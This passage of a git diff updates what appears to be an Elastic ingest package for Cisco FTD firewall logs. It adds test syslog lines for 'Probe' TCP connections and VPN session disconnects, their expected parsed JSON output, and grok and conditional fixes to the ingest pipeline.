"idps", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log index bb73701536a..3eee55ef038 100755 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log @@ -1,4 +1,8 @@ <166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Outside2:89.160.20.131/443 (89.160.20.131/443) <166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Outside1:89.160.20.131/443 (89.160.20.131/443) <166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Inside1:10.0.1.50/443 (89.160.20.131/443) -<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443) \ No newline at end of file +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Outside2:89.160.20.131/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Outside1:89.160.20.131/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Inside1:10.0.1.50/443 (89.160.20.131/443) +<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443) \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json index 9995e14cb08..e09b9e8ac87 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-inbound-outbound.log-expected.json @@ -460,6 +460,467 @@ "preserve_original_event", "private_is_internal" ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Outside2", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Outside1" + } + }, + "destination": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Outside2:89.160.20.131/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:kkkQlFDvK1ZyGot4PPZhg0/MqmI=", + "direction": "external", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Outside2" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Outside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "89.160.20.131", + "175.16.199.6" + ] + }, + "source": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Outside1", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Inside1" + } + }, + "destination": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Outside1:89.160.20.131/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:3W4wan8g9ISYpx9IpbIc54Q1o/w=", + "direction": "outbound", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Outside1" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Inside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "10.0.1.50", + "175.16.199.6", + "89.160.20.131" + ] + }, + "source": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Inside1", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Outside1" + } + }, + "destination": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "89.160.20.131" + }, + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Inside1:10.0.1.50/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:G8j+ms0Bhz2T9H+SyWVoctzVJUE=", + "direction": "inbound", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Inside1" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Outside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "89.160.20.131", + "175.16.199.6", + "10.0.1.50" + ] + }, + "source": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Inside2", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Inside1" + } + }, + "destination": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "89.160.20.131" + }, + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:z5q8NYG9K8KFtSXwZWp6YhfDuEg=", + "direction": "internal", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Inside2" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Inside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "10.0.1.50", + "175.16.199.6", + "89.160.20.131" + ] + }, + "source": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log new file mode 100644 index 00000000000..8e3ffa0cda1 --- /dev/null +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log @@ -0,0 +1 @@ +<164>Feb 19 2024 16:29:38: %FTD-4-113019: Group = VPN, Username = abcd, IP = 10.0.100.30, Session disconnected. Session Type: SSL, Duration: 1h:24m:30s, Bytes xmt: 25292048, Bytes rcv: 12546398, Reason: User Requested \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log-expected.json new file mode 100644 index 00000000000..683026fd8d9 --- /dev/null +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log-expected.json @@ -0,0 +1,71 @@ +{ + "expected": [ + { + "@timestamp": "2024-02-19T16:29:38.000Z", + "cisco": { + "ftd": { + "session_type": "SSL" + } + }, + "destination": { + "address": "10.0.100.30", + "bytes": 12546398, + "ip": "10.0.100.30" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "client-vpn-disconnected", + "code": "113019", + "duration": 5070000000000, + "end": "2024-02-19T16:29:38.000Z", + "original": "<164>Feb 19 2024 16:29:38: %FTD-4-113019: Group = VPN, Username = abcd, IP = 10.0.100.30, Session disconnected. Session Type: SSL, Duration: 1h:24m:30s, Bytes xmt: 25292048, Bytes rcv: 12546398, Reason: User Requested", + "reason": "User Requested", + "severity": 4, + "start": "2024-02-19T15:05:08.000Z", + "timezone": "UTC" + }, + "log": { + "level": "warning", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 164, + "severity": { + "code": 4 + } + } + }, + "network": { + "bytes": 37838446 + }, + "observer": { + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "10.0.100.30" + ], + "user": [ + "abcd" + ] + }, + "source": { + "bytes": 25292048, + "user": { + "group": { + "name": "VPN" + }, + "name": "abcd" + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log index 1bda42701cf..c2904f95a64 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log @@ -45,6 +45,9 @@ Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447 Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index f7f95d236fe..141ac1217f3 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -3413,6 +3413,252 @@ "preserve_original_event" ] }, + { + "@timestamp": "2018-12-11T08:01:31.000Z", + "cisco": { + "ftd": { + "connection_id": "447236", + "destination_interface": "dmz", + "source_interface": "outside" + } + }, + "destination": { + "address": "192.168.1.34", + "ip": "192.168.1.34", + "port": 5678 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "flow-expiration", + "category": [ + "network" + ], + "code": "302014", + "duration": 0, + "end": "2018-12-11T08:01:31.000Z", + "kind": "event", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "reason": "TCP FINs", + "severity": 6, + "start": "2018-12-11T08:01:31.000Z", + "timezone": "UTC", + "type": [ + "connection", + "end" + ] + }, + "host": { + "hostname": "127.0.0.1" + }, + "log": { + "level": "informational" + }, + "network": { + "bytes": 14804, + "community_id": "1:jpl9i9YcwfmJL6rzeoC+kNxutF0=", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "dmz" + } + }, + "hostname": "127.0.0.1", + "ingress": { + "interface": { + "name": "outside" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "192.168.2.222", + "192.168.1.34" + ] + }, + "source": { + "address": "192.168.2.222", + "ip": "192.168.2.222", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2018-12-11T08:01:38.000Z", + "cisco": { + "ftd": { + "connection_id": "447234", + "destination_interface": "dmz", + "source_interface": "outside" + } + }, + "destination": { + "address": "192.168.1.35", + "ip": "192.168.1.35", + "port": 5678 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "flow-expiration", + "category": [ + "network" + ], + "code": "302014", + "duration": 68000000000, + "end": "2018-12-11T08:01:38.000Z", + "kind": "event", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "reason": "TCP FINs", + "severity": 6, + "start": "2018-12-11T08:00:30.000Z", + "timezone": "UTC", + "type": [ + "connection", + "end" + ] + }, + "host": { + "hostname": "127.0.0.1" + }, + "log": { + "level": "informational" + }, + "network": { + "bytes": 134781, + "community_id": "1:0O2zwShv7d4alKTT/UJuXDWhJtE=", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "dmz" + } + }, + "hostname": "127.0.0.1", + "ingress": { + "interface": { + "name": "outside" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "192.168.2.222", + "192.168.1.35" + ] + }, + "source": { + "address": "192.168.2.222", + "ip": "192.168.2.222", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2018-12-11T08:01:38.000Z", + "cisco": { + "ftd": { + "connection_id": "447234", + "destination_interface": "dmz", + "source_interface": "outside" + } + }, + "destination": { + "address": "192.168.1.35", + "ip": "192.168.1.35", + "port": 5678 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "flow-expiration", + "category": [ + "network" + ], + "code": "302014", + "duration": 68000000000, + "end": "2018-12-11T08:01:38.000Z", + "kind": "event", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "reason": "TCP FINs", + "severity": 6, + "start": "2018-12-11T08:00:30.000Z", + "timezone": "UTC", + "type": [ + "connection", + "end" + ] + }, + "host": { + "hostname": "127.0.0.1" + }, + "log": { + "level": "informational" + }, + "network": { + "bytes": 134781, + "community_id": "1:0O2zwShv7d4alKTT/UJuXDWhJtE=", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "dmz" + } + }, + "hostname": "127.0.0.1", + "ingress": { + "interface": { + "name": "outside" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "192.168.2.222", + "192.168.1.35" + ] + }, + "source": { + "address": "192.168.2.222", + "ip": "192.168.2.222", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, { "@timestamp": "2018-12-11T08:01:38.000Z", "cisco": { @@ -5091,7 +5337,7 @@ } }, { - "@timestamp": "2023-11-01T16:42:22.000Z", + "@timestamp": "2024-11-01T16:42:22.000Z", "cisco": { "ftd": { "connection_id": "1488052803", diff --git a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index e3f54fc4786..521b7aa2b31 100644 --- a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -51,7 +51,7 @@ processors: - grok: field: _temp_.full_message patterns: - - "%{FTD_PREFIX}-(?:%{FTD_SUFFIX:_temp_.cisco.suffix}-)?%{NONNEGINT:event.severity:int}-%{POSINT:_temp_.cisco.message_id}?:?\\s*%{GREEDYDATA:message}" + - "%{FTD_PREFIX}-(?:%{FTD_SUFFIX:_temp_.cisco.suffix}?-)?%{NONNEGINT:event.severity:int}-%{POSINT:_temp_.cisco.message_id}?:?\\s*%{GREEDYDATA:message}" # Before version 6.3, messages for connection, security intelligence, and intrusion events didn't include an event type ID in the message header. - "%{GREEDYDATA:message}" pattern_definitions: @@ -66,7 +66,7 @@ processors: - set: field: _temp_.cisco.message_id value: "" - if: "ctx?._temp_?.cisco?.message_id == null" + if: "ctx._temp_?.cisco?.message_id == null" # # set default event.severity to 7 (debug): @@ -76,7 +76,7 @@ processors: - set: field: event.severity value: 7 - if: "ctx?.event?.severity == null" + if: "ctx.event?.severity == null" # Time zone can come from three sources, choose in order: log, config, locale, default to UTC. - set: @@ -290,7 +290,7 @@ processors: patterns: - ^%{NOTSPACE:event.outcome} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{POSINT:source.port})?\s*(\(%{CISCO_USER:_temp_.cisco.source_username}\) )?dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{POSINT:destination.port})?%{DATA}by access-group "%{NOTSPACE:_temp_.cisco.list_id}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) @@ -318,12 +318,12 @@ processors: field: event.outcome description: "111004" value: "success" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'OK'" + if: "ctx._temp_.cisco.message_id == '111004' && ctx._temp_.cisco.cli_outcome == 'OK'" - set: field: event.outcome description: "111004" value: "failure" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'FAILED'" + if: "ctx._temp_.cisco.message_id == '111004' && ctx._temp_.cisco.cli_outcome == 'FAILED'" - remove: field: _temp_.cisco.cli_outcome ignore_missing: true @@ -357,7 +357,7 @@ processors: description: "113005" field: "message" patterns: - - "AAA user authentication Rejected(%{SPACE})?: reason = %{REASON}(%{SPACE})?: server = %{IP:destination.address}(%{SPACE})?: user = ?%{CISCO_USER:source.user.name}(%{SPACE})?: user IP = %{IP:source.address}" + - "AAA user authentication Rejected(%{SPACE})?: reason = %{REASON}(%{SPACE})?: server = %{IP:destination.address}(%{SPACE})?: user = ?(%{CISCO_USER:source.user.name}|\\*+)(%{SPACE})?: user IP = %{IP:source.address}" pattern_definitions: REASON: (AAA failure|Account has been disabled) CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) @@ -392,7 +392,7 @@ processors: - "Group <%{NOTSPACE:source.user.group.name}> User <%{CISCO_USER:source.user.name}> IP <%{IP:source.address}>" - "Group %{NOTSPACE:source.user.group.name} User %{CISCO_USER:source.user.name} IP %{IP:source.address}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) - grok: @@ -400,9 +400,9 @@ processors: field: "message" description: "302013, 302015" patterns: - - Built %{NOTSPACE} %{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port} \(%{IPORHOST:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER:_temp_.cisco.destination_username}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} + - Built %{NOTSPACE} (?:Probe )?%{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port} \(%{IPORHOST:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER:_temp_.cisco.destination_username}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) @@ -419,7 +419,7 @@ processors: - Teardown %{DATA} %{NOTSPACE:network.transport} translation from %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port}(\s*\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} duration %{DURATION:_temp_.duration_hms} pattern_definitions: NOTCOLON: "[^:]*" - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) DURATION: "%{INT}:%{MINUTE}:%{SECOND}" @@ -435,7 +435,7 @@ processors: patterns: - "Built %{NOTSPACE} %{NOTSPACE:network.protocol} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER:_temp_.cisco.destination_username}\\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER:_temp_.cisco.source_username}\\) )?(type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})?" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: 